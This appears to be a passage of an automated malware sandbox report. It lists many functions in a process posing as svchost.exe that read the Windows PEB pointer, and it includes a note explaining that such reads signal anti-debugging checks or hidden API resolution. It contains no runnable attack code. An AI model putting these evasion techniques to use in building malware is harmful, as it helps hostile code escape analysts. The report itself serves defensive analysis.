            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB06F1 mov eax, dword ptr fs:[00000030h]2_2_03AB06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB06F1 mov eax, dword ptr fs:[00000030h]2_2_03AB06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6A6C7 mov ebx, dword ptr fs:[00000030h]2_2_03A6A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6A6C7 mov eax, dword ptr fs:[00000030h]2_2_03A6A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4E627 mov eax, dword ptr fs:[00000030h]2_2_03A4E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A66620 mov eax, dword ptr fs:[00000030h]2_2_03A66620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A68620 mov eax, dword ptr fs:[00000030h]2_2_03A68620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3262C mov eax, dword ptr fs:[00000030h]2_2_03A3262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE609 mov eax, dword ptr fs:[00000030h]2_2_03AAE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4260B mov eax, dword ptr fs:[00000030h]2_2_03A4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4260B mov eax, dword ptr fs:[00000030h]2_2_03A4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4260B mov eax, dword ptr fs:[00000030h]2_2_03A4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4260B mov eax, dword ptr fs:[00000030h]2_2_03A4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4260B mov eax, dword ptr fs:[00000030h]2_2_03A4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4260B mov eax, dword ptr fs:[00000030h]2_2_03A4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4260B mov eax, dword ptr fs:[00000030h]2_2_03A4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72619 mov eax, dword ptr fs:[00000030h]2_2_03A72619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF866E mov eax, dword ptr fs:[00000030h]2_2_03AF866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF866E mov eax, dword ptr fs:[00000030h]2_2_03AF866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6A660 mov eax, dword ptr fs:[00000030h]2_2_03A6A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6A660 mov eax, dword ptr fs:[00000030h]2_2_03A6A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A62674 mov eax, dword ptr fs:[00000030h]2_2_03A62674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4C640 mov eax, dword ptr fs:[00000030h]2_2_03A4C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB05A7 mov eax, dword ptr fs:[00000030h]2_2_03AB05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB05A7 mov eax, dword ptr fs:[00000030h]2_2_03AB05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB05A7 mov eax, dword ptr fs:[00000030h]2_2_03AB05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A545B1 mov eax, dword ptr fs:[00000030h]2_2_03A545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A545B1 mov eax, dword ptr fs:[00000030h]2_2_03A545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A32582 mov eax, dword ptr fs:[00000030h]2_2_03A32582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A32582 mov ecx, dword ptr fs:[00000030h]2_2_03A32582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A64588 mov eax, dword ptr fs:[00000030h]2_2_03A64588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6E59C mov eax, dword ptr fs:[00000030h]2_2_03A6E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03A5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03A5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03A5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03A5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03A5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03A5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03A5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03A5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A325E0 mov eax, dword ptr fs:[00000030h]2_2_03A325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6C5ED mov eax, dword ptr fs:[00000030h]2_2_03A6C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6C5ED mov eax, dword ptr fs:[00000030h]2_2_03A6C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6E5CF mov eax, dword ptr fs:[00000030h]2_2_03A6E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6E5CF mov eax, dword ptr fs:[00000030h]2_2_03A6E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A365D0 mov eax, dword ptr fs:[00000030h]2_2_03A365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6A5D0 mov eax, dword ptr fs:[00000030h]2_2_03A6A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6A5D0 mov eax, dword ptr fs:[00000030h]2_2_03A6A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40535 mov eax, dword ptr fs:[00000030h]2_2_03A40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40535 mov eax, dword ptr fs:[00000030h]2_2_03A40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40535 mov eax, dword ptr fs:[00000030h]2_2_03A40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40535 mov eax, dword ptr fs:[00000030h]2_2_03A40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40535 mov eax, dword ptr fs:[00000030h]2_2_03A40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40535 mov eax, dword ptr fs:[00000030h]2_2_03A40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5E53E mov eax, dword ptr fs:[00000030h]2_2_03A5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5E53E mov eax, dword ptr fs:[00000030h]2_2_03A5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5E53E mov eax, dword ptr fs:[00000030h]2_2_03A5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5E53E mov eax, dword ptr fs:[00000030h]2_2_03A5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5E53E mov eax, dword ptr fs:[00000030h]2_2_03A5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC6500 mov eax, dword ptr fs:[00000030h]2_2_03AC6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B04500 mov eax, dword ptr fs:[00000030h]2_2_03B04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B04500 mov eax, dword ptr fs:[00000030h]2_2_03B04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B04500 mov eax, dword ptr fs:[00000030h]2_2_03B04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B04500 mov eax, dword ptr fs:[00000030h]2_2_03B04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B04500 mov eax, dword ptr fs:[00000030h]2_2_03B04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B04500 mov eax, dword ptr fs:[00000030h]2_2_03B04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B04500 mov eax, dword ptr fs:[00000030h]2_2_03B04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6656A mov eax, dword ptr fs:[00000030h]2_2_03A6656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6656A mov eax, dword ptr fs:[00000030h]2_2_03A6656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6656A mov eax, dword ptr fs:[00000030h]2_2_03A6656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A38550 mov eax, dword ptr fs:[00000030h]2_2_03A38550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A38550 mov eax, dword ptr fs:[00000030h]2_2_03A38550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A364AB mov eax, dword ptr fs:[00000030h]2_2_03A364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A644B0 mov ecx, dword ptr fs:[00000030h]2_2_03A644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ABA4B0 mov eax, dword ptr fs:[00000030h]2_2_03ABA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AEA49A mov eax, dword ptr fs:[00000030h]2_2_03AEA49A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A304E5 mov ecx, dword ptr fs:[00000030h]2_2_03A304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2E420 mov eax, dword ptr fs:[00000030h]2_2_03A2E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2E420 mov eax, dword ptr fs:[00000030h]2_2_03A2E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2E420 mov eax, dword ptr fs:[00000030h]2_2_03A2E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2C427 mov eax, dword ptr fs:[00000030h]2_2_03A2C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB6420 mov eax, dword ptr fs:[00000030h]2_2_03AB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB6420 mov eax, dword ptr fs:[00000030h]2_2_03AB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB6420 mov eax, dword ptr fs:[00000030h]2_2_03AB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB6420 mov eax, dword ptr fs:[00000030h]2_2_03AB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB6420 mov eax, dword ptr fs:[00000030h]2_2_03AB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB6420 mov eax, dword ptr fs:[00000030h]2_2_03AB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB6420 mov eax, dword ptr fs:[00000030h]2_2_03AB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6A430 mov eax, dword ptr fs:[00000030h]2_2_03A6A430
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A68402 mov eax, dword ptr fs:[00000030h]2_2_03A68402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A68402 mov eax, dword ptr fs:[00000030h]2_2_03A68402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A68402 mov eax, dword ptr fs:[00000030h]2_2_03A68402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ABC460 mov ecx, dword ptr fs:[00000030h]2_2_03ABC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5A470 mov eax, dword ptr fs:[00000030h]2_2_03A5A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5A470 mov eax, dword ptr fs:[00000030h]2_2_03A5A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5A470 mov eax, dword ptr fs:[00000030h]2_2_03A5A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6E443 mov eax, dword ptr fs:[00000030h]2_2_03A6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6E443 mov eax, dword ptr fs:[00000030h]2_2_03A6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6E443 mov eax, dword ptr fs:[00000030h]2_2_03A6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6E443 mov eax, dword ptr fs:[00000030h]2_2_03A6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6E443 mov eax, dword ptr fs:[00000030h]2_2_03A6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6E443 mov eax, dword ptr fs:[00000030h]2_2_03A6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6E443 mov eax, dword ptr fs:[00000030h]2_2_03A6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6E443 mov eax, dword ptr fs:[00000030h]2_2_03A6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AEA456 mov eax, dword ptr fs:[00000030h]2_2_03AEA456
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2645D mov eax, dword ptr fs:[00000030h]2_2_03A2645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5245A mov eax, dword ptr fs:[00000030h]2_2_03A5245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40BBE mov eax, dword ptr fs:[00000030h]2_2_03A40BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40BBE mov eax, dword ptr fs:[00000030h]2_2_03A40BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE4BB0 mov eax, dword ptr fs:[00000030h]2_2_03AE4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE4BB0 mov eax, dword ptr fs:[00000030h]2_2_03AE4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A38BF0 mov eax, dword ptr fs:[00000030h]2_2_03A38BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A38BF0 mov eax, dword ptr fs:[00000030h]2_2_03A38BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A38BF0 mov eax, dword ptr fs:[00000030h]2_2_03A38BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5EBFC mov eax, dword ptr fs:[00000030h]2_2_03A5EBFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ABCBF0 mov eax, dword ptr fs:[00000030h]2_2_03ABCBF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A50BCB mov eax, dword ptr fs:[00000030h]2_2_03A50BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A50BCB mov eax, dword ptr fs:[00000030h]2_2_03A50BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A50BCB mov eax, dword ptr fs:[00000030h]2_2_03A50BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A30BCD mov eax, dword ptr fs:[00000030h]2_2_03A30BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A30BCD mov eax, dword ptr fs:[00000030h]2_2_03A30BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A30BCD mov eax, dword ptr fs:[00000030h]2_2_03A30BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADEBD0 mov eax, dword ptr fs:[00000030h]2_2_03ADEBD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5EB20 mov eax, dword ptr fs:[00000030h]2_2_03A5EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5EB20 mov eax, dword ptr fs:[00000030h]2_2_03A5EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF8B28 mov eax, dword ptr fs:[00000030h]2_2_03AF8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF8B28 mov eax, dword ptr fs:[00000030h]2_2_03AF8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B04B00 mov eax, dword ptr fs:[00000030h]2_2_03B04B00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAEB1D mov eax, dword ptr fs:[00000030h]2_2_03AAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAEB1D mov eax, dword ptr fs:[00000030h]2_2_03AAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAEB1D mov eax, dword ptr fs:[00000030h]2_2_03AAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAEB1D mov eax, dword ptr fs:[00000030h]2_2_03AAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAEB1D mov eax, dword ptr fs:[00000030h]2_2_03AAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAEB1D mov eax, dword ptr fs:[00000030h]2_2_03AAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAEB1D mov eax, dword ptr fs:[00000030h]2_2_03AAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAEB1D mov eax, dword ptr fs:[00000030h]2_2_03AAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAEB1D mov eax, dword ptr fs:[00000030h]2_2_03AAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2CB7E mov eax, dword ptr fs:[00000030h]2_2_03A2CB7E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE4B4B mov eax, dword ptr fs:[00000030h]2_2_03AE4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE4B4B mov eax, dword ptr fs:[00000030h]2_2_03AE4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B02B57 mov eax, dword ptr fs:[00000030h]2_2_03B02B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B02B57 mov eax, dword ptr fs:[00000030h]2_2_03B02B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B02B57 mov eax, dword ptr fs:[00000030h]2_2_03B02B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B02B57 mov eax, dword ptr fs:[00000030h]2_2_03B02B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC6B40 mov eax, dword ptr fs:[00000030h]2_2_03AC6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC6B40 mov eax, dword ptr fs:[00000030h]2_2_03AC6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFAB40 mov eax, dword ptr fs:[00000030h]2_2_03AFAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD8B42 mov eax, dword ptr fs:[00000030h]2_2_03AD8B42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A28B50 mov eax, dword ptr fs:[00000030h]2_2_03A28B50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADEB50 mov eax, dword ptr fs:[00000030h]2_2_03ADEB50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A38AA0 mov eax, dword ptr fs:[00000030h]2_2_03A38AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A38AA0 mov eax, dword ptr fs:[00000030h]2_2_03A38AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A86AA4 mov eax, dword ptr fs:[00000030h]2_2_03A86AA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3EA80 mov eax, dword ptr fs:[00000030h]2_2_03A3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3EA80 mov eax, dword ptr fs:[00000030h]2_2_03A3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3EA80 mov eax, dword ptr fs:[00000030h]2_2_03A3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3EA80 mov eax, dword ptr fs:[00000030h]2_2_03A3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3EA80 mov eax, dword ptr fs:[00000030h]2_2_03A3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3EA80 mov eax, dword ptr fs:[00000030h]2_2_03A3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3EA80 mov eax, dword ptr fs:[00000030h]2_2_03A3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3EA80 mov eax, dword ptr fs:[00000030h]2_2_03A3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3EA80 mov eax, dword ptr fs:[00000030h]2_2_03A3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B04A80 mov eax, dword ptr fs:[00000030h]2_2_03B04A80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A68A90 mov edx, dword ptr fs:[00000030h]2_2_03A68A90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6AAEE mov eax, dword ptr fs:[00000030h]2_2_03A6AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6AAEE mov eax, dword ptr fs:[00000030h]2_2_03A6AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A86ACC mov eax, dword ptr fs:[00000030h]2_2_03A86ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A86ACC mov eax, dword ptr fs:[00000030h]2_2_03A86ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A86ACC mov eax, dword ptr fs:[00000030h]2_2_03A86ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A30AD0 mov eax, dword ptr fs:[00000030h]2_2_03A30AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A64AD0 mov eax, dword ptr fs:[00000030h]2_2_03A64AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A64AD0 mov eax, dword ptr fs:[00000030h]2_2_03A64AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6CA24 mov eax, dword ptr fs:[00000030h]2_2_03A6CA24
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5EA2E mov eax, dword ptr fs:[00000030h]2_2_03A5EA2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A54A35 mov eax, dword ptr fs:[00000030h]2_2_03A54A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A54A35 mov eax, dword ptr fs:[00000030h]2_2_03A54A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6CA38 mov eax, dword ptr fs:[00000030h]2_2_03A6CA38
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ABCA11 mov eax, dword ptr fs:[00000030h]2_2_03ABCA11
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6CA6F mov eax, dword ptr fs:[00000030h]2_2_03A6CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6CA6F mov eax, dword ptr fs:[00000030h]2_2_03A6CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6CA6F mov eax, dword ptr fs:[00000030h]2_2_03A6CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADEA60 mov eax, dword ptr fs:[00000030h]2_2_03ADEA60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AACA72 mov eax, dword ptr fs:[00000030h]2_2_03AACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AACA72 mov eax, dword ptr fs:[00000030h]2_2_03AACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A36A50 mov eax, dword ptr fs:[00000030h]2_2_03A36A50
            Note: on 32-bit Windows fs:[30h] holds the PEB pointer (TEB+0x30); a read of it is the usual first instruction of a PEB.BeingDebugged or PEB.NtGlobalFlag check, or of a walk of the loader lists to resolve APIs without an import table. Repeated reads inside one function are listed once with their count.
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A36A50 mov eax, dword ptr fs:[00000030h] (6 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A40A5B mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h] (13 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A309AD mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AB89B3 mov esi, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AB89B3 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03ABE9E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A629F9 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AC69C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A3A9D0 mov eax, dword ptr fs:[00000030h] (6 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A649D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AFA9D3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AB892A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AC892B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AAE908 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03ABC912 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A28918 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A56962 mov eax, dword ptr fs:[00000030h] (3 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A7096E mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A7096E mov edx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AD4978 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03ABC97C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AB0946 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B04940 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A30887 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03ABC89D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AFA8E4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A6C8F9 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A5E8C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B008C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A52835 mov eax, dword ptr fs:[00000030h] (5 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A52835 mov ecx, dword ptr fs:[00000030h]
